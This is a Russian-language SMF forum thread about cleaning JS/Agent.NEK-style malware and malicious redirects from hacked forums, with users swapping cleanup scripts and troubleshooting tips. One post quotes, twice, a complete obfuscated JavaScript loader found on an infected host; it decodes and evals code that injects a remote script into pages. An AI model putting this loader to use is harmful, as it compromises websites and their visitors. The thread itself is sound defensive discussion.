Cообщество пользователей SMF

Clear
[at]author dotzero
[at]copyright 2012. dotzero.ru
[at]version 1.0.0
Последняя версия: https://gist.github.com/2030120
Обновленный вариант: https://gist.github.com/2359497

Обнаружение и удаление вирусов вида JS/Agent.NEK и аналогов заражающих .js файлы на сервере.
Общие принципы работы из clear-script за авторством M1zh0rY

Принцип работы:
  - Поиск инфицированных файлов
  - Резервное копирование инфицированных файлов
  - Удаление вирусов
  - Сохранение файлов без вирусов

Хорошая штука 

Цитата: digger от 05 апреля 2012, 16:10:04Обнаружение и удаление вирусов вида JS/Agent.NEK и аналогов

вот эта байда это оно?

c=3-1;i=-2+c;if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean()["prototype"].q}catch(egewgsd){if(window.document)f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i71i11i16i77i14i10i6i64i80i68i81i64i67i76i62i57i69i6i63i61i76i69i81i65i72i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;690!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"Code"](w[j]*1+40);}if(v)z=s;if(f)e(z);

Цитата: IKresh от 13 апреля 2012, 23:41:27

вот эта байда это оно?

c=3-1;i=-2+c;if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean()["prototype"].q}catch(egewgsd){if(window.document)f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i71i11i16i77i14i10i6i64i80i68i81i64i67i76i62i57i69i6i63i61i76i69i81i65i72i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;690!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"Code"](w[j]*1+40);}if(v)z=s;if(f)e(z);

Не совсем оно, но из той же серии. Тут есть ссылка на обновленный скрипт, он вроде такое тоже чистит http://www.simplemachines.ru/index.php?topic=14504.msg112078#msg112078

Цитата: digger от 13 апреля 2012, 23:53:26Не совсем оно, но из той же серии. Тут есть ссылка на обновленный скрипт, он вроде такое тоже чистит http://www.simplemachines.ru/index.php?topic=14504.msg112078#msg112078

спасибо а то мне сегодня с утра кто то залил эту гадость на хост, все сайты заразил 2 смф и 2 джумлы, завтра с утра почищу.
                     
                  
                  
                     
                     
                     
                        

Цитата: digger от 13 апреля 2012, 23:53:26
Не совсем оно, но из той же серии. Тут есть ссылка на обновленный скрипт, он вроде такое тоже чистит http://www.simplemachines.ru/index.php?topic=14504.msg112078#msg112078

скрипты от моей заразы не помогли, пока просто автозаменой закоментил все где "c=3-1;i=-2+c;if(parseInt("0"+"1"+"2"+"3")" встречалось

Цитата: digger от 05 апреля 2012, 16:10:04Clear
[at]author dotzero
[at]copyright 2012. dotzero.ru
[at]version 1.0.0
Последняя версия: https://gist.github.com/2030120
Обновленный вариант: https://gist.github.com/2359497

Обнаружение и удаление вирусов вида JS/Agent.NEK и аналогов заражающих .js файлы на сервере.
Общие принципы работы из clear-script за авторством M1zh0rY

Принцип работы:
  - Поиск инфицированных файлов
  - Резервное копирование инфицированных файлов
  - Удаление вирусов
  - Сохранение файлов без вирусов

А может ли это чудо помочь с избавлением от тотального редиректа любого обращения к smf 1.1 и smf 1.7 на какой-то левый сайт http://pagesinxt.com, редиректа, не позволяющего даже увидеть вход в админпанель?

во-первых .htaccess посмотрите, нет ли там имени этого сайта

Цитата: maestrosite.ru от 24 ноября 2012, 07:17:55во-первых .htaccess посмотрите, нет ли там имени этого сайта

Оба smf-форума, которые единственно из двух-трех сотен сайтов на моём аккаунте подхватили эту заразу, ставились мною из фантастико, то есть без моего участия, и в них вообще нет файлов .htaccess, по крайней мере в корневых директориях этих сайтов

К слову сказать, я при помощи replacer.php несколько раз, оптом и в розницу, проверял эти форумы и на название сайта, на который идёт редирект, и на название других сайтов, с которым засветившиеся в инете спецы связывают эту заразу, и на разные сочетания кодов, которые они предлагают искать - всё по нулям. Почему у меня и возникла идея полностью заменить дистрибутив сайта, но сделать я этого не могу - исходного дистрибутива у меня не было и нет, а попытки использовать различные апгрейды натыкаются на то, что я вообще не могу найти способа войти в админку при таком шустром перенаправлении. Что и заставляет меня искать другие лекарства от этой напасти, очень уж не хотелось бы потерять содержимое этих форумов

Цитата: Serg2015 от 24 ноября 2012, 13:20:51
Почему у меня и возникла идея полностью заменить дистрибутив сайта, но сделать я этого не могу - исходного дистрибутива у меня не было и нет

С оффсайта можно скачать дистриб любой древности, если речь об smf.

Цитировать
вообще не могу найти способа войти в админку при таком шустром перенаправлении.

Javascript в браузере выключите и попробуйте зайти.

Если под оффсайтом понимать официальный сайт SMF, то я его перерыл ещё неделю назад, до дистрибутивов так и не нашёл - возможно, не там искал!

Но самое интересное другое - отключил по Вашему совету JS и - о чудо! - свободно зашёл на первый сайт, затем в админку, обновил штатным образом 1.1.7 до 1.1.8, и проблема редиректа исчезла, в том числе и на браузерах с включенным JS, по крайней мере в данный момент времени. Со вторым же smf-сайтом этот фокус не прошёл - на сайт захожу, но при наборе логин-пароля попадаю не в админку, а на какой-то левый гугл-ресурс. С этим что-то можно попытаться сделать?

А за подсказку, лишний раз демонстрирующую, чем отличается профессионал от любителя, отдельное Вам спасибо!!!

Цитата: Serg2015 от 24 ноября 2012, 19:29:17Если под оффсайтом понимать официальный сайт SMF, то я его перерыл ещё неделю назад, до дистрибутивов так и не нашёл - возможно, не там искал!

http://download.simplemachines.org/index.php?archive и выпадающем списке выбираете нужную версию

Цитировать
Но самое интересное другое - отключил по Вашему совету JS и - о чудо! - свободно зашёл на первый сайт, затем в админку, обновил штатным образом 1.1.7 до 1.1.8, и проблема редиректа исчезла, в том числе и на браузерах с включенным JS, по крайней мере в данный момент времени. Со вторым же smf-сайтом этот фокус не прошёл - на сайт захожу, но при наборе логин-пароля попадаю не в админку, а на какой-то левый гугл-ресурс. С этим что-то можно попытаться сделать?

Значит на втором сайте вирус не в js-скриптах. Возьмите свежий Айболит и проверьте оба сайта http://revisium.com/ai/

Воистину, смотрел в книгу - видел фигу! В этом разделе был, по списку погулял, но дальше 1.1.16 пройти ума не хватило, не говоря уже об обращении к выпадающему списку... Спасибо за наставление на путь истинный!

Айболитом посмотрел, он выдал мне чуть ли не гигабайт косяков, в том числе и в самом Айболите, и даже в Апгрейде с офсайта. О лечении этого дела с моими познаниями даже говорить не приходится, поэтому я перевёл ситуацию на свой новый хостинг, полностью заменил дистрибутив (благодаря Вашей подсказке), вызвал сайт - и снова тот же проклятый редирект! Убрал JS, открылась админка, попытался зайти - попал не в гуглятник, а в то, что сайт не может найти прежний хостинг. И это при том, что дистрибутив чисто с офсайта, в файл установок внесены только реквизиты БД (она, естественно, взята со старого хостинга). Значит, путь к логину лежит где-то в базе данных?

Попробую обновить форум до 2.0.2, может, поможет? В первом случае ведь помогло!

Цитата: Serg2015 от 25 ноября 2012, 18:32:22Значит, путь к логину лежит где-то в базе данных?

Посмотрите файл \forum\Settings.php   строку $boardurl = 'http://........

Файл settings.php я не то что бы посмотрел - я его самым тщательнейшим образом исследовал, и в нём было всё в порядке. Более того, через replacer я поискал соответствующие упоминания о "левом" адресе в других файлах дистрибутива - с нулевым результатом. Так что единственное, что приходит на голову, это косяки в базе данных

Более того, эта ошибка в процессе апгрейда каким-то образом исчезла, но осталась главная проблема - проблема редиректа. Я что-то не догоняю: на новом хостинге я в ноль меняю дистрибутив форума на только что скачанный с офсайта, а зараза проявляется мгновенно. Более того, когда я вхожу на сайт через браузер с отключенным JS, мой сайт с бешенной скоростью обменивается информацией с сайтом, на который посетителей перекидывает редирект. Как это возможно? Может ли быть зараза в базе данных? И как её там обнаружить? А потом вылечить?

repair_settings.php запускали? чтоб настройки на новом хостинге прописать?

Круто! Я и словов-то таких не знал! Вот уж, воистину, век живи - век учись!

Скачал файл, загрузил, запустил, восхитился тому богатству решений моих проблем, которые содержит этот чудо-инструмент, но, увы - облом: при нажатии на кнопку "сохранить настройки" получают ответ, что на этом хостинге нет файла install.php (он-то здесь каким боком?), который, по мнению источника принятия решений по настройкам, должен лежать вообще на другом хостинге. Вот тебе и на! В огороде бузина, а в Киеве дядька! И что с этим можно сделать?

Вы пути ему реальные (новые) сказали?

Там оказалось ещё интереснее, что, собственно, и вызвало мой восторг от лицезрения сего творения рук человеческих: программа не только привела с полтора десятка моих неправильных (оставшихся от старого хостинга) настроек, местонахождение которых я не раз и не два вполне безуспешно пытался отыскать - она по каждой из этих ошибок предложила свой вариант решения. Каждый из этих вариантов я внимательно изучил и с радостью поддержал. Остальное Вы знаете

Где же там полтора десятка взялось? ))) Пути к теме раз, пути к смайлам и иконкам два, сеттинг пшп - три, URL-адрес форума, Абсолютный путь к директории с форумом, Абсолютный путь к директории Sources, Директория для кэша, пароль к базе, и то последние 5 в сеттинге прописаны.

Ну, полтора десятка, это, конечно же, художественное преувеличение, вызванное моей эмоциональной реакцией на это великолепие (с моей, чайниковой, точки зрения, ессно), хотя и 11 адресаций в моём случае - это более чем уважаемая цифра, которая вполне может стоить и пятнадцати, и пятнадцати тысяч. Если, разумеется, мне удастся использовать сей потенциал на пользу дела

Так что за вольное обращение с цифрами звиняйте! Уж очень мне понравилась программка. Вот бы ещё сработала, как надо!

А как им пользоваться то вообще? скачал по ссылке что то gist2359497-dd070a262fb20701c22959b6c0fc0d6eed2ef7de.tar.gz

Зачем так делать друг, я являюсь законным создателем AuntAsya, проект в разморозке и начале обновления и новой версии

Цитата: m1zh0ry от 19 января 2016, 11:54:22Зачем так делать друг, я являюсь законным создателем AuntAsya, проект в разморозке и начале обновления и новой версии

что именно делать? поясните..
если вы о том что ваш проект был взят за основу так вопрос больше не  к нам, а к разработчику... ссылка и ник указаны в первом сообщении, о том что проект основан на вашем ПО тоже вроде упомянули...
или что-то не так??

Подскажите как ей пользоваться? Скачал разархивировал папка 2359497-dd070a262fb20701c22959b6c0fc0d6eed2ef7de в ней файл auntAsya.php Его нужно в корень сайта или?

Цитата: Alex32 от 04 декабря 2016, 17:15:31Подскажите как ей пользоваться? Скачал разархивировал папка 2359497-dd070a262fb20701c22959b6c0fc0d6eed2ef7de в ней файл auntAsya.php Его нужно в корень сайта или?

Ну видимо в корень сайта и запуск из адресной строки

Цитата: S.T.A.L.K.E.R. от 04 декабря 2016, 19:01:50Ну видимо в корень сайта и запуск из адресной строки

То есть открыть на хостинге его просто как например bom.php? открыл так надпись на английском -скрипт закончил работы1. Потом к адресу сайта в адресной строке добвил  auntAsya.php открыл - таже самая надпись. Сейчас на своих сайтах вордпресс попробую так же

А помогает этот скрипт найти вирусы которые переадресуют заход на форум? У меня несколько пользователей жалуется что при заходе с телефона или планшета на форум, их переадресует на какие то левые рекламные сайты. Проверка в pr-cy говорит что яндекс и гугл вирусов не находят. Самого меня тоже с телефона пару раз переадресовывало на другие сайты...

Цитата: Alex32 от 04 декабря 2016, 22:40:50То есть открыть на хостинге его просто как например bom.php? открыл так надпись на английском -скрипт закончил работы1. Потом к адресу сайта в адресной строке добвил  auntAsya.php открыл - таже самая надпись. Сейчас на своих сайтах вордпресс попробую так же

Если файлов мало на форуме и хостинг хороший скрипт быстро отработает.
 

Цитата: Dimon S. от 05 декабря 2016, 08:49:19А помогает этот скрипт найти вирусы которые переадресуют заход на форум?

Попробовать и проверить не тяжело.

Так этот файл пчп на постоянке пусть будет в корневой?

Цитата: Alex32 от 05 декабря 2016, 17:55:39Так этот файл пчп на постоянке пусть будет в корневой?

А зачем он там?Проверку сделали и удалили.При следущей проверке опять так же

Цитата: S.T.A.L.K.E.R. от 05 декабря 2016, 09:58:44Если файлов мало на форуме и хостинг хороший скрипт быстро отработает.
 Попробовать и проверить не тяжело.

Умел бы я что то делать и не испортить ничего, рискнул бы
А так... Надо специалиста привлекать

Цитата: Dimon S. от 05 декабря 2016, 08:49:19роверка в pr-cy говорит что яндекс и гугл вирусов не находят. Самого меня тоже с телефона пару раз переадресовывало на другие сайты...

Я вам летом ещё говорил (когда форум переносил на новый домен), что там у вас левые скрипты по файлам, но вы не захотели исправлять.

Цитата: GeorG от 07 декабря 2016, 19:34:53Я вам летом ещё говорил (когда форум переносил на новый домен), что там у вас левые скрипты по файлам, но вы не захотели исправлять.

Я не не захотел. На тот момент и задачи были более глобальные и бюджет был исчерпан. Сейчас же появилась эта возможность, которая как я понимаю может многозначительно упростить эту процедуру

Цитата: Dimon S. от 07 декабря 2016, 19:46:28Сейчас же появилась эта возможность, которая как я понимаю может многозначительно упростить эту процедуру

Она и раньше была (это процедура), но по идеи обычно только "убивала" форум, или не лечила его полностью, или вообще никак (если повезёт и вы сами чего нужного не удалите с помощью неё). Иначе бы лечить сайты было, как два пальца об асфальт.

p.s.  Если потребуется помощь в чистке форума, пишите в ЛС